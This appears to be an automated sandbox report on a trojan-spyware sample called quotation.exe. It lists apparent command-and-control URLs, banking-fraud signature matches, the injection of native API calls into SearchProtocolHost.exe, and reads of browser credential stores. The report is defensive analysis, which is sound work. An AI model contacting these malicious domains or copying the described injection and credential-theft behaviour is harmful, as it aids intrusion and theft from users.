                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 796; date: Tue, 03 Dec 2024 13:16:22 GMT; server: LiteSpeed
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 796; date: Tue, 03 Dec 2024 13:16:24 GMT; server: LiteSpeed
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found; Connection: close; cache-control: private, no-cache, no-store, must-revalidate, max-age=0; pragma: no-cache; content-type: text/html; content-length: 796; date: Tue, 03 Dec 2024 13:16:27 GMT; server: LiteSpeed
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004FAC000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000003CFC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://conseilnsaftogo.org/lqxd/?PLpD=wYwrhtOuglxnIn28LlpI4
                Source: quotation.exe, 00000000.00000002.2082562762.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000003FF8000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002D48000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.canadavinreport.site/4d2l/?PLpD=ZGBp9LUVeZbORoknng5
                Source: gkTgnrvdOG.exe, 00000007.00000002.4522340469.0000000004ADB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org
                Source: gkTgnrvdOG.exe, 00000007.00000002.4522340469.0000000004ADB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.conseilnsaftogo.org/lqxd/
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/px.js?ch=1
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/px.js?ch=2
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004C88000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.cortisalincontrol.net/sk-logabpstatus.php?a=TWtMZ29kWWVvSVBIWGlFSGk5UEV4UFpDeUlmS21GbHVCU
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000004964000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000036B4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.000000000418A000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002EDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.4521141897.0000000003CD4000.00000004.10000000.00040000.00000000.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000002A24000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675200151.000000000B774000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: gkTgnrvdOG.exe, 00000007.00000002.4520585812.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2YY
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfQu
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033vS
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002BD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: SearchProtocolHost.exe, 00000006.00000003.2564570064.0000000007CD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: SearchProtocolHost.exe, 00000006.00000003.2569893724.0000000007DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: gkTgnrvdOG.exe, 00000007.00000002.4520585812.0000000003B6A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strato.de

                E-Banking Fraud

                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sampleStatic PE information: Filename: quotation.exe
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0042CAB3 NtClose,3_2_0042CAB3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2B60 NtClose,LdrInitializeThunk,3_2_012F2B60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_012F2DF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_012F2C70
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F35C0 NtCreateMutant,LdrInitializeThunk,3_2_012F35C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F4340 NtSetContextThread,3_2_012F4340
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F4650 NtSuspendThread,3_2_012F4650
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2BA0 NtEnumerateValueKey,3_2_012F2BA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2B80 NtQueryInformationFile,3_2_012F2B80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2BE0 NtQueryValueKey,3_2_012F2BE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2BF0 NtAllocateVirtualMemory,3_2_012F2BF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2AB0 NtWaitForSingleObject,3_2_012F2AB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2AF0 NtWriteFile,3_2_012F2AF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2AD0 NtReadFile,3_2_012F2AD0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2D30 NtUnmapViewOfSection,3_2_012F2D30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2D00 NtSetInformationFile,3_2_012F2D00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2D10 NtMapViewOfSection,3_2_012F2D10
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2DB0 NtEnumerateKey,3_2_012F2DB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2DD0 NtDelayExecution,3_2_012F2DD0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2C00 NtQueryInformationProcess,3_2_012F2C00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2C60 NtCreateKey,3_2_012F2C60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2CA0 NtQueryInformationToken,3_2_012F2CA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2CF0 NtOpenProcess,3_2_012F2CF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2CC0 NtQueryVirtualMemory,3_2_012F2CC0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2F30 NtCreateSection,3_2_012F2F30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2F60 NtCreateProcessEx,3_2_012F2F60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2FA0 NtQuerySection,3_2_012F2FA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2FB0 NtResumeThread,3_2_012F2FB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2F90 NtProtectVirtualMemory,3_2_012F2F90
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2FE0 NtCreateFile,3_2_012F2FE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2E30 NtWriteVirtualMemory,3_2_012F2E30
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2EA0 NtAdjustPrivilegesToken,3_2_012F2EA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2E80 NtReadVirtualMemory,3_2_012F2E80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2EE0 NtQueueApcThread,3_2_012F2EE0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3010 NtOpenDirectoryObject,3_2_012F3010
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3090 NtSetValueKey,3_2_012F3090
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F39B0 NtGetContextThread,3_2_012F39B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3D10 NtOpenProcessToken,3_2_012F3D10
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F3D70 NtOpenThread,3_2_012F3D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03244340 NtSetContextThread,LdrInitializeThunk,6_2_03244340
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03244650 NtSuspendThread,LdrInitializeThunk,6_2_03244650
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242B60 NtClose,LdrInitializeThunk,6_2_03242B60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03242BA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03242BE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03242BF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242AF0 NtWriteFile,LdrInitializeThunk,6_2_03242AF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242AD0 NtReadFile,LdrInitializeThunk,6_2_03242AD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242F30 NtCreateSection,LdrInitializeThunk,6_2_03242F30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242FB0 NtResumeThread,LdrInitializeThunk,6_2_03242FB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242FE0 NtCreateFile,LdrInitializeThunk,6_2_03242FE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03242E80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03242EE0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03242D30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03242D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03242DF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242DD0 NtDelayExecution,LdrInitializeThunk,6_2_03242DD0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242C60 NtCreateKey,LdrInitializeThunk,6_2_03242C60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03242C70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03242CA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032435C0 NtCreateMutant,LdrInitializeThunk,6_2_032435C0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_032439B0 NtGetContextThread,LdrInitializeThunk,6_2_032439B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242B80 NtQueryInformationFile,6_2_03242B80
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242AB0 NtWaitForSingleObject,6_2_03242AB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242F60 NtCreateProcessEx,6_2_03242F60
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242FA0 NtQuerySection,6_2_03242FA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242F90 NtProtectVirtualMemory,6_2_03242F90
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242E30 NtWriteVirtualMemory,6_2_03242E30
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242EA0 NtAdjustPrivilegesToken,6_2_03242EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242D00 NtSetInformationFile,6_2_03242D00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242DB0 NtEnumerateKey,6_2_03242DB0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242C00 NtQueryInformationProcess,6_2_03242C00
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242CF0 NtOpenProcess,6_2_03242CF0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03242CC0 NtQueryVirtualMemory,6_2_03242CC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243010 NtOpenDirectoryObject,6_2_03243010
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243090 NtSetValueKey,6_2_03243090
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243D10 NtOpenProcessToken,6_2_03243D10
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_03243D70 NtOpenThread,6_2_03243D70
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A393A0 NtCreateFile,6_2_02A393A0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A396B0 NtClose,6_2_02A396B0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A39610 NtDeleteFile,6_2_02A39610
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A39510 NtReadFile,6_2_02A39510
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A39820 NtAllocateVirtualMemory,6_2_02A39820
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0328F290 appears 105 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 031FB970 appears 280 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 03245130 appears 58 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 0327EA12 appears 86 times
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 03257E54 appears 102 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 012F5130 appears 58 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 01307E54 appears 111 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 0133F290 appears 105 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 012AB970 appears 280 times
                Source: C:\Users\user\Desktop\quotation.exeCode function: String function: 0132EA12 appears 86 times
                Source: quotation.exe, 00000000.00000002.2087626887.0000000009AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2081981191.0000000001138000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuZQt.exe0 vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2082562762.0000000002D39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2081873076.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2083220381.0000000004539000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs quotation.exe
                Source: quotation.exe, 00000000.00000002.2086657801.0000000007B50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs quotation.exe
                Source: quotation.exe, 00000000.00000000.2041027420.0000000000A02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuZQt.exe0 vs quotation.exe
                Source: quotation.exe, 00000003.00000002.2381927769.00000000013AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs quotation.exe
                Source: quotation.exeBinary or memory string: OriginalFilenameuZQt.exe0 vs quotation.exe
                Source: quotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: quotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, PhE7cd7e532AwGMfh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.483d230.0.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, PhE7cd7e532AwGMfh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, PhE7cd7e532AwGMfh6.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.47b2210.2.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.quotation.exe.9ae0000.5.raw.unpack, vaqtyES1x9bnG2cr2n.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/13
                Source: C:\Users\user\Desktop\quotation.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\quotation.exe.log
                Source: C:\Users\user\Desktop\quotation.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile created: C:\Users\user\AppData\Local\Temp\sE716IK71M
                Source: quotation.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: SearchProtocolHost.exe, 00000006.00000003.2565934336.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2565504142.0000000002C14000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4519487841.0000000002C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: quotation.exeReversingLabs: Detection: 39%
                Source: unknownProcess created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"
                Source: C:\Users\user\Desktop\quotation.exeProcess created: C:\Users\user\Desktop\quotation.exe "C:\Users\user\Desktop\quotation.exe"
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\quotation.exeSection loaded: dwrite.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: tquery.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeSection loaded: sspicli.dll
